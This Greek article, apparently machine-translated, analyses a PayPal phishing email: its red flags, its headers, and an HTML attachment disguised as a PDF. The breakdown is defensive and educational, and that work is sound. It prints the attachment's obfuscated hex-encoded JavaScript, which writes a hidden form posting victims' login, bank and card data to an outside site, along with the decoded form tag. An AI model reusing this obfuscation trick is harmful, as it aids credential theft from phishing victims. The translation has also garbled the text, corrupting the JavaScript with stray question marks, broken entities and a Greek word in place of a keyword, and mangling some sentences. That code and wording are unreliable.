10Sep
Στον σημερινό κόσμο όπου οι πληροφορίες του καθενός είναι ηλεκτρονικές, το ηλεκτρονικό ψάρεμα είναι μία από τις πιο δημοφιλείς και καταστροφικές επιθέσεις στο διαδίκτυο, επειδή μπορείτε πάντα να καθαρίσετε έναν ιό, αλλά αν κλαπούν τα τραπεζικά σας στοιχεία, έχετε πρόβλημα.Ακολουθεί μια ανάλυση μιας τέτοιας επίθεσης που λάβαμε.
Μην νομίζετε ότι είναι μόνο οι τραπεζικές σας λεπτομέρειες που είναι σημαντικές: τελικά, εάν κάποιος αποκτήσει τον έλεγχο της σύνδεσης στο λογαριασμό σας, δεν γνωρίζει μόνο τις πληροφορίες που περιέχονται σε αυτόν τον λογαριασμό, αλλά οι πιθανότητες είναι ότι οι ίδιες πληροφορίες σύνδεσης μπορούν να χρησιμοποιηθούν σε διάφορεςάλλους λογαριασμούς.Και αν υπονομεύσουν τον λογαριασμό ηλεκτρονικού ταχυδρομείου σας, μπορούν να επαναφέρουν όλους τους άλλους κωδικούς πρόσβασης.
Έτσι, εκτός από τη διατήρηση ισχυρών και ποικίλων κωδικών πρόσβασης, πρέπει πάντα να είστε επιφυλακτικοί για ψεύτικα μηνύματα ηλεκτρονικού ταχυδρομείου που μεταμφιέζονται ως το πραγματικό πράγμα.Ενώ οι περισσότερες απόπειρες ηλεκτρονικού "ψαρέματος" είναι ερασιτεχνικές, μερικές είναι αρκετά πειστικές, γι 'αυτό είναι σημαντικό να κατανοήσουμε πώς να τις αναγνωρίσουμε στο επίπεδο της επιφάνειας καθώς και πώς λειτουργούν κάτω από την κουκούλα.
Εικόνα από asirap
Εξετάζοντας τι είναι σε απλό βλέμμα
Το παράδειγμα ηλεκτρονικού ταχυδρομείου μας, όπως και οι περισσότερες απόπειρες ηλεκτρονικού ψαρέματος, σας «ειδοποιεί» για τη δραστηριότητα στο λογαριασμό σας στο PayPal, η οποία υπό κανονικές συνθήκες θα ήταν ανησυχητική.Έτσι, η πρόσκληση για δράση είναι να επαληθεύσετε / επαναφέρετε τον λογαριασμό σας, υποβάλλοντας σχεδόν κάθε προσωπική πληροφορία που μπορείτε να σκεφτείτε.Και πάλι, αυτό είναι αρκετά τυποποιημένο.
Παρόλο που υπάρχουν σίγουρα εξαιρέσεις, σχεδόν όλα τα μηνύματα ηλεκτρονικού "ψαρέματος" και ηλεκτρονικού ταχυδρομείου απάτης φορτώνονται με κόκκινες σημαίες απευθείας στο μήνυμα.Ακόμα κι αν το κείμενο είναι πειστικό, συνήθως μπορείτε να βρείτε πολλά σφάλματα γεμάτα σε όλο το σώμα του μηνύματος που δείχνουν ότι το μήνυμα δεν είναι νόμιμο.
Το σώμα μηνυμάτων
Με την πρώτη ματιά, αυτό είναι ένα από τα καλύτερα ηλεκτρονικά μηνύματα ηλεκτρονικού ψαρέματος που έχω δει.Δεν υπάρχουν ορθογραφικά ή γραμματικά λάθη και το verbiage διαβάζεται σύμφωνα με αυτό που θα περίμενε κανείς.Ωστόσο, υπάρχουν μερικές κόκκινες σημαίες που μπορείτε να δείτε όταν εξετάζετε λίγο περισσότερο το περιεχόμενο.
- "Paypal" - Η σωστή περίπτωση είναι "PayPal"( κεφάλαιο P).Μπορείτε να δείτε και τις δύο παραλλαγές που χρησιμοποιούνται στο μήνυμα.Οι εταιρείες είναι πολύ σκόπιμες με το branding τους, οπότε είναι αμφίβολο ότι κάτι τέτοιο θα περάσει τη διαδικασία proofing.
- "επιτρέψτε ActiveX" - Πόσες φορές έχετε δει μια νόμιμη επιχείρηση βασισμένη στο διαδίκτυο, το μέγεθος του Paypal χρησιμοποιεί ένα ιδιόκτητο στοιχείο που λειτουργεί μόνο σε ένα μόνο πρόγραμμα περιήγησης, ειδικά όταν υποστηρίζει πολλαπλά προγράμματα περιήγησης;Σίγουρα, κάπου εκεί έξω κάποια εταιρεία το κάνει, αλλά αυτή είναι μια κόκκινη σημαία.
- "με ασφάλεια". - Παρατηρήστε πώς αυτή η λέξη δεν ευθυγραμμίζεται στο περιθώριο με το υπόλοιπο κείμενο της παραγράφου.Ακόμη και αν τεντώσω το παράθυρο λίγο περισσότερο, δεν τυλίγεται ή διαστήματος σωστά.
- "Paypal!" - Ο χώρος πριν το θαυμαστικό μοιάζει άβολο.Ακριβώς μια άλλη ιδιορρυθμία που είμαι βέβαιος ότι δεν θα είναι σε ένα νόμιμο ηλεκτρονικό ταχυδρομείο.
- "PayPal - Ενημέρωση λογαριασμού Form.pdf.htm" - Γιατί Paypal επισυνάψετε ένα "PDF" ειδικά όταν θα μπορούσαν απλώς να συνδεθούν με μια σελίδα στην περιοχή τους;Επιπλέον, γιατί θα προσπαθούσαν να αποκρύψουν ένα αρχείο HTML ως PDF;Αυτή είναι η μεγαλύτερη κόκκινη σημαία όλων αυτών.
Η επικεφαλίδα μηνυμάτων
Όταν ρίξετε μια ματιά στην κεφαλίδα του μηνύματος, εμφανίζονται μερικές άλλες κόκκινες σημαίες:
- Η διεύθυνση από [email protected].
- Λείπει η διεύθυνση για τη διεύθυνση.Δεν το έκανα κενό, απλά δεν είναι μέρος της τυποποιημένης κεφαλίδας μηνύματος.Συνήθως μια εταιρεία που έχει το όνομά σας θα εξατομικεύσει το μήνυμα ηλεκτρονικού ταχυδρομείου σε εσάς.
Το συνημμένο
Όταν ανοίγω το συνημμένο, μπορείτε να δείτε αμέσως ότι η διάταξη δεν είναι σωστή καθώς δεν υπάρχουν πληροφορίες στυλ.Και πάλι, γιατί το PayPal θα στείλει μέσω ηλεκτρονικού ταχυδρομείου μια φόρμα HTML, όταν θα μπορούσαν απλά να σας δώσουν έναν σύνδεσμο στον ιστότοπό τους;
Σημείωση: Το χρησιμοποιήσαμε το ενσωματωμένο πρόγραμμα προβολής συνημμένων HTML του Gmail για αυτό, αλλά θα συνιστούσαμε να μην ΑΝΟΙΧΤΕ τα συνημμένα από απατεώνες.Ποτέ.Πάντα.Πολύ συχνά περιέχουν εκμεταλλεύσεις που θα εγκαταστήσουν trojans στον υπολογιστή σας για να κλέψουν τα στοιχεία του λογαριασμού σας.
Μετακινώντας λίγο περισσότερο μπορείτε να δείτε ότι αυτή η φόρμα ζητά όχι μόνο για τις πληροφορίες σύνδεσης του PayPal, αλλά και για τις τραπεζικές και πιστωτικές κάρτες.Ορισμένες από τις εικόνες είναι σπασμένες.
Είναι προφανές ότι αυτή η απόπειρα ηλεκτρονικού "ψαρέματος" πηγαίνει μετά από τα πάντα με ένα χτύπημα.
Η τεχνική κατανομή
Ενώ θα πρέπει να είναι αρκετά σαφές με βάση αυτό που είναι απλά ότι αυτό είναι μια απόπειρα ηλεκτρονικού "ψαρέματος", τώρα θα καταρρίψουμε το τεχνικό makeup του ηλεκτρονικού ταχυδρομείου και θα δούμε τι μπορούμε να βρούμε.
Πληροφορίες από το συνημμένο
Το πρώτο πράγμα που πρέπει να ρίξετε μια ματιά είναι η πηγή HTML της φόρμας συνημμένου που είναι αυτό που υποβάλλει τα δεδομένα στην πλαστή τοποθεσία.
Κατά την γρήγορη προβολή της πηγής, όλοι οι σύνδεσμοι εμφανίζονται έγκυροι καθώς υποδηλώνουν είτε "paypal.com" είτε "paypalobjects.com", οι οποίοι είναι και οι δύο νόμιμοι.
Τώρα θα ρίξουμε μια ματιά σε μερικές βασικές πληροφορίες σελίδας που συγκεντρώνει ο Firefox στη σελίδα.
Όπως μπορείτε να δείτε, μερικά από τα γραφικά τραβήχτηκαν από τους τομείς "blessedtobe.com", "goodhealthpharmacy.com" και "pic-upload.de" αντί για τους νόμιμους τομείς PayPal.
Πληροφορίες από τις επικεφαλίδες μηνυμάτων ηλεκτρονικού ταχυδρομείου
Στη συνέχεια θα ρίξουμε μια ματιά στις ακατέργαστες κεφαλίδες μηνυμάτων email.Το Gmail το καθιστά διαθέσιμο μέσω της επιλογής μενού Εμφάνιση πρωτοτύπου στο μήνυμα.
Κοιτάζοντας τις πληροφορίες κεφαλίδας για το αρχικό μήνυμα, μπορείτε να δείτε ότι αυτό το μήνυμα συντάχθηκε χρησιμοποιώντας το Outlook Express 6. Αμφιβάλλω ότι το PayPal έχει κάποιον στο προσωπικό που στέλνει το καθένα από αυτά τα μηνύματα χειροκίνητα μέσω ενός ξεπερασμένου προγράμματος-πελάτη ηλεκτρονικού ταχυδρομείου.
Εξετάζοντας τώρα τις πληροφορίες δρομολόγησης, μπορούμε να δούμε τη διεύθυνση IP τόσο του αποστολέα όσο και του διακομιστή αλληλογραφίας αναμετάδοσης.
Η διεύθυνση IP του χρήστη είναι αρχικός αποστολέας.Κάνοντας μια γρήγορη αναζήτηση στις πληροφορίες IP, μπορούμε να δούμε ότι η IP αποστολής είναι στη Γερμανία.
Και όταν εξετάζουμε τη διεύθυνση IP του διακομιστή αλληλογραφίας( mail.itak.at), μπορούμε να δούμε ότι πρόκειται για ISP με έδρα την Αυστρία.Αμφιβάλλω ότι το PayPal δρομολογεί τα μηνύματα ηλεκτρονικού ταχυδρομείου τους απευθείας μέσω ενός ISP που εδρεύει στην Αυστρία όταν έχει ένα τεράστιο αγρόκτημα διακομιστών που θα μπορούσε εύκολα να χειριστεί αυτό το έργο.
Πού πηγαίνουν τα δεδομένα;
Έτσι, έχουμε σαφώς διαπιστώσει ότι πρόκειται για ηλεκτρονικό μήνυμα ηλεκτρονικού "ψαρέματος"( phishing) και συγκέντρωσε κάποιες πληροφορίες σχετικά με το πού προέρχεται το μήνυμα, αλλά τι γίνεται με την αποστολή των δεδομένων σας;
Για να το δούμε αυτό, πρέπει πρώτα να αποθηκεύσουμε το συνημμένο HTM στην επιφάνεια εργασίας μας και να το ανοίξουμε σε ένα πρόγραμμα επεξεργασίας κειμένου.Μετακινώντας μέσα από αυτό, όλα φαίνονται να είναι εντάξει εκτός από όταν φτάσουμε σε ένα ύποπτο ψάχνει Javascript μπλοκ.
Διαγράφοντας την πλήρη πηγή του τελευταίου τμήματος του Javascript, βλέπουμε:
& lt; script language = "JavaScript" type = "text / javascript" & gt;
// Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =»3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e»? Y =»? Για( i = 0? Θ & lt? X.length? I + = 2){ y + = unescape( '%' + x.substr( i, 2))} document.write( y).
& lt; / script & gt;
Οποτεδήποτε βλέπετε μια μεγάλη μπερδεμένη σειρά από φαινομενικά τυχαία γράμματα και αριθμούς ενσωματωμένα σε ένα μπλοκ Javascript, είναι συνήθως κάτι ύποπτο.Εξετάζοντας τον κώδικα, η μεταβλητή "x" ορίζεται σε αυτή τη μεγάλη συμβολοσειρά και στη συνέχεια αποκωδικοποιείται στη μεταβλητή "y".Το τελικό αποτέλεσμα της μεταβλητής "y" είναι στη συνέχεια γραμμένο στο έγγραφο ως HTML.
Από τη μεγάλη σειρά αποτελείται από τους αριθμούς 0-9 και τα γράμματα af, είναι πιο πιθανό κωδικοποιούνται μέσω ενός απλού ASCII μετατροπής Hex:
3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
Μεταφράζεται σε:
& lt? Όνομα φόρμας =»κύριο» id =»κύριο»μέθοδος = "post" action = "http: //www.dexposure.net/bbs/data/ verify.php" & gt;
Δεν είναι τυχαίο ότι αυτή αποκωδικοποιεί σε μια έγκυρη ετικέτα φόρμας HTML που στέλνει τα αποτελέσματα όχι στο PayPal, αλλά σε έναν ιστότοπο απατεώνων.
Επιπλέον, όταν βλέπετε την προέλευση HTML της φόρμας, θα δείτε ότι αυτή η ετικέτα φόρμας δεν είναι ορατή επειδή δημιουργείται δυναμικά μέσω του Javascript.Αυτός είναι ένας έξυπνος τρόπος για να αποκρύψετε τι κάνει στην πραγματικότητα το HTML αν κάποιος απλά δει την παραγόμενη πηγή του συνημμένου( όπως κάναμε νωρίτερα) σε αντίθεση με το άνοιγμα του συνημμένου απευθείας σε ένα πρόγραμμα επεξεργασίας κειμένου.
Το τρέξιμο ενός γρήγορου whois στον ιστότοπο που προσβάλλει, μπορούμε να δούμε ότι πρόκειται για έναν τομέα που φιλοξενείται σε έναν δημοφιλή web host, 1and1.
Αυτό που ξεχωρίζει είναι ότι ο τομέας χρησιμοποιεί ένα αναγνωρίσιμο όνομα( σε αντίθεση με κάτι σαν το "dfh3sjhskjhw.net") και ο τομέας έχει καταχωριστεί για 4 χρόνια.Εξαιτίας αυτού, πιστεύω ότι αυτός ο τομέας ήταν πειρατεμένος και χρησιμοποιήθηκε ως πιόνι σε αυτή την απόπειρα phishing.
Ο κυνισμός είναι μια καλή υπεράσπιση
Όταν πρόκειται να παραμείνουμε ασφαλείς στο διαδίκτυο, ποτέ δεν πονάει να έχει ένα καλό κομμάτι του κυνισμού.
Ενώ είμαι βέβαιος ότι υπάρχουν περισσότερες κόκκινες σημαίες στο παράδειγμα ηλεκτρονικού ταχυδρομείου, αυτό που έχουμε επισημάνει παραπάνω είναι δείκτες που είδαμε μετά από μερικά μόνο λεπτά εξέτασης.Υπόθετα, αν το επίπεδο επιφάνειας του ηλεκτρονικού ταχυδρομείου μιμηθεί το νόμιμο αντίγραφό του 100%, η τεχνική ανάλυση θα αποκαλύψει ακόμα την πραγματική του φύση.Αυτός είναι ο λόγος για τον οποίο είναι η εισαγωγή να είναι σε θέση να εξετάσει και τι μπορείτε και δεν μπορείτε να δείτε.